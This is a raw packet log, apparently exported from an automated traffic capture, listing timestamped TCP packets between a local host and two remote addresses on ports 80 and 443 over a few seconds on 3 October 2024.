                                                                                                                                                                                                                                                Oct 3, 2024 20:47:05.134210110 CEST80416231680.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:05.134273052 CEST623168041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:05.134767056 CEST623168041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:05.140646935 CEST80416231680.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:05.670975924 CEST44362315188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:05.671047926 CEST62315443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:05.671544075 CEST62315443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:05.671569109 CEST44362315188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:05.672755003 CEST62315443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:05.672765970 CEST44362315188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:05.887322903 CEST80416231680.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:05.887361050 CEST80416231680.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:05.891583920 CEST623168041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:05.894368887 CEST623178041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:05.894388914 CEST623168041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:05.899350882 CEST80416231680.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:05.899358988 CEST80416231780.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:05.899770021 CEST623178041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:05.899770021 CEST623178041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:05.905065060 CEST80416231780.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:06.129798889 CEST44362315188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:06.129863024 CEST44362315188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:06.131597996 CEST62315443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:06.155788898 CEST62315443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:06.155806065 CEST44362315188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:06.526292086 CEST62318443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:06.526343107 CEST44362318188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:06.526511908 CEST62318443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:06.526861906 CEST62318443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:06.526875019 CEST44362318188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:06.548466921 CEST80416231780.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:06.548667908 CEST623178041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:06.548846006 CEST80416231780.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:06.548957109 CEST623178041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:06.549031019 CEST623178041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:06.551315069 CEST623198041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:06.554054976 CEST80416231780.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:06.556205034 CEST80416231980.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:06.556401968 CEST623198041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:06.556838036 CEST623198041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:06.561814070 CEST80416231980.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:06.562020063 CEST623198041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:07.217674017 CEST44362318188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:07.217747927 CEST62318443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:07.218256950 CEST62318443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:07.218267918 CEST44362318188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:07.219763041 CEST62318443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:07.219768047 CEST44362318188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:07.674334049 CEST44362318188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:07.674386024 CEST62318443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:07.674391031 CEST44362318188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:07.674726009 CEST62318443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:07.679559946 CEST62318443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:07.679577112 CEST44362318188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:07.933654070 CEST62320443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:07.933698893 CEST44362320188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:07.943300962 CEST62320443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:07.943300962 CEST62320443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:07.943356037 CEST44362320188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:08.465174913 CEST44362320188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:08.465303898 CEST62320443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:08.467160940 CEST62320443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:08.467160940 CEST62320443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:08.467170954 CEST44362320188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:08.467185974 CEST44362320188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:08.802874088 CEST44362320188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:08.802938938 CEST62320443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:08.802949905 CEST44362320188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:08.802968025 CEST44362320188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:08.802994967 CEST62320443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:08.803005934 CEST62320443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:08.821172953 CEST62320443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:08.821190119 CEST44362320188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:09.405354023 CEST62321443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:09.405451059 CEST44362321188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:09.405530930 CEST62321443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:09.405891895 CEST62321443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:09.405922890 CEST44362321188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:10.241578102 CEST44362321188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:10.241678953 CEST62321443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:10.532799006 CEST62321443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:10.532835960 CEST44362321188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:10.533972979 CEST62321443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:10.533987045 CEST44362321188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:10.631341934 CEST623228041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:11.505377054 CEST80416232280.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:11.507407904 CEST623228041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:11.537453890 CEST623228041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:11.542753935 CEST80416232280.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:11.834994078 CEST44362321188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:11.835086107 CEST44362321188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:11.835391045 CEST62321443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:11.863539934 CEST62321443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:11.863601923 CEST44362321188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.019992113 CEST62323443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.020032883 CEST44362323188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.020443916 CEST62323443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.021394968 CEST62323443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.021420956 CEST44362323188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.272783995 CEST80416232280.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.272824049 CEST80416232280.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.273236990 CEST80416232280.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.274902105 CEST623228041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.274902105 CEST623228041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.275403023 CEST623248041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.280483961 CEST80416232280.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.280796051 CEST80416232480.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.280960083 CEST623248041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.281589031 CEST623248041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.286607027 CEST80416232480.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.553822041 CEST44362323188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.553916931 CEST62323443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.554599047 CEST62323443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.554609060 CEST44362323188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.556183100 CEST62323443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.556190968 CEST44362323188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.942415953 CEST80416232480.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.942485094 CEST623248041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.942998886 CEST623248041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.943397999 CEST623258041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.945194006 CEST80416232480.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.945301056 CEST623248041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.947813034 CEST80416232480.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.948497057 CEST80416232580.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.948589087 CEST623258041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.948697090 CEST623258041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.955375910 CEST80416232580.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.955646992 CEST80416232580.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:12.955699921 CEST623258041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:13.008423090 CEST44362323188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:13.008491039 CEST62323443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:13.008505106 CEST44362323188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:13.008565903 CEST62323443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:13.008594036 CEST44362323188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:13.008641005 CEST62323443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:13.010814905 CEST62323443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:13.010833979 CEST44362323188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:13.197196960 CEST62326443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:13.197251081 CEST44362326188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:13.197354078 CEST62326443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:13.197758913 CEST62326443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:13.197777987 CEST44362326188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:13.719547987 CEST44362326188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:13.719645023 CEST62326443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:13.721355915 CEST62326443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:13.721355915 CEST62326443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:13.721371889 CEST44362326188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:13.721395016 CEST44362326188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.003319025 CEST623278041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.008976936 CEST80416232780.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.009351969 CEST623278041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.010068893 CEST623278041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.015522003 CEST80416232780.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.178035975 CEST44362326188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.178121090 CEST44362326188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.178275108 CEST62326443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.180332899 CEST62326443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.180350065 CEST44362326188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.632467985 CEST80416232780.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.632545948 CEST623278041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.632630110 CEST80416232780.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.632728100 CEST623278041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.633218050 CEST623278041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.634656906 CEST623288041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.638102055 CEST80416232780.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.639575958 CEST80416232880.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.641434908 CEST623288041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.645414114 CEST623288041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.650262117 CEST80416232880.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.983174086 CEST62329443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.983222008 CEST44362329188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.983283997 CEST62329443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.983669996 CEST62329443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:14.983678102 CEST44362329188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:15.260365009 CEST80416232880.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:15.260421991 CEST623288041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:15.260778904 CEST80416232880.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:15.260813951 CEST623288041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:15.260838985 CEST623288041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:15.261265039 CEST623308041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:15.266947985 CEST80416232880.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:15.266963005 CEST80416233080.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:15.267024994 CEST623308041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:15.267138958 CEST623308041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:15.272389889 CEST80416233080.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:15.272443056 CEST623308041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:15.444961071 CEST44362329188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:15.445065022 CEST62329443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:15.446382046 CEST62329443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:15.446393013 CEST44362329188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:15.447911024 CEST62329443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:15.447916031 CEST44362329188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:15.980521917 CEST44362329188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:15.980664968 CEST62329443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:15.980667114 CEST44362329188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:15.980775118 CEST62329443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:15.982346058 CEST62329443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:15.982359886 CEST44362329188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:16.070219994 CEST62331443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:16.070267916 CEST44362331188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:16.070405960 CEST62331443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:16.070797920 CEST62331443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:16.070815086 CEST44362331188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:16.548173904 CEST44362331188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:16.548378944 CEST62331443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:16.548752069 CEST62331443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:16.548758030 CEST44362331188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:16.549838066 CEST62331443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:16.549841881 CEST44362331188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:16.984364986 CEST44362331188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:16.984457016 CEST44362331188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:16.984472990 CEST62331443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:16.984529972 CEST62331443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:17.020035028 CEST62331443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:17.020064116 CEST44362331188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:17.532885075 CEST62332443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:17.532987118 CEST44362332188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:17.533056974 CEST62332443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:17.533396959 CEST62332443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:17.533428907 CEST44362332188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:17.998856068 CEST44362332188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:17.998950958 CEST62332443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:17.999277115 CEST62332443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:17.999285936 CEST44362332188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:18.000407934 CEST62332443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:18.000415087 CEST44362332188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:18.347347975 CEST623338041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:18.352551937 CEST80416233380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:18.352722883 CEST623338041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:18.352963924 CEST623338041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:18.357949018 CEST80416233380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:18.458843946 CEST44362332188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:18.458997011 CEST44362332188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:18.459295034 CEST62332443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:18.459295034 CEST62332443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:18.559921980 CEST62334443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:18.560009956 CEST44362334188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:18.560838938 CEST62334443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:18.561144114 CEST62334443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:18.561171055 CEST44362334188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:18.839493990 CEST62332443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:18.839565039 CEST44362332188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:18.998990059 CEST80416233380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:18.999069929 CEST623338041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:18.999486923 CEST80416233380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:18.999541044 CEST623338041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:18.999579906 CEST623338041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:19.000071049 CEST623358041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:19.011719942 CEST80416233380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:19.012149096 CEST80416233580.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:19.012226105 CEST623358041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:19.012741089 CEST623358041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:19.023406029 CEST80416233580.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:19.043888092 CEST44362334188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:19.043967962 CEST62334443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:19.044503927 CEST62334443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:19.044529915 CEST44362334188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:19.045970917 CEST62334443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:19.045984030 CEST44362334188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:19.565726995 CEST44362334188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:19.565809011 CEST62334443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:19.565869093 CEST44362334188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:19.565906048 CEST44362334188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:19.565938950 CEST62334443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:19.565969944 CEST62334443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:19.566086054 CEST62334443192.168.2.7188.114.97.3
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:19.566119909 CEST44362334188.114.97.3192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:47:19.654916048 CEST80416233580.78.24.30192.168.2.7
